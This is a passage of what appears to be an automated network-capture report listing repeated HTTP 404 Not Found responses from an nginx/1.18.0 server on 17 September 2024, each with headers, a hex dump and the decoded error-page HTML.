Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:11:55 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:11:58 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:12:38 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:12:41 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:12:44 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:12:47 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:12:51 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:12:54 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:12:56 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
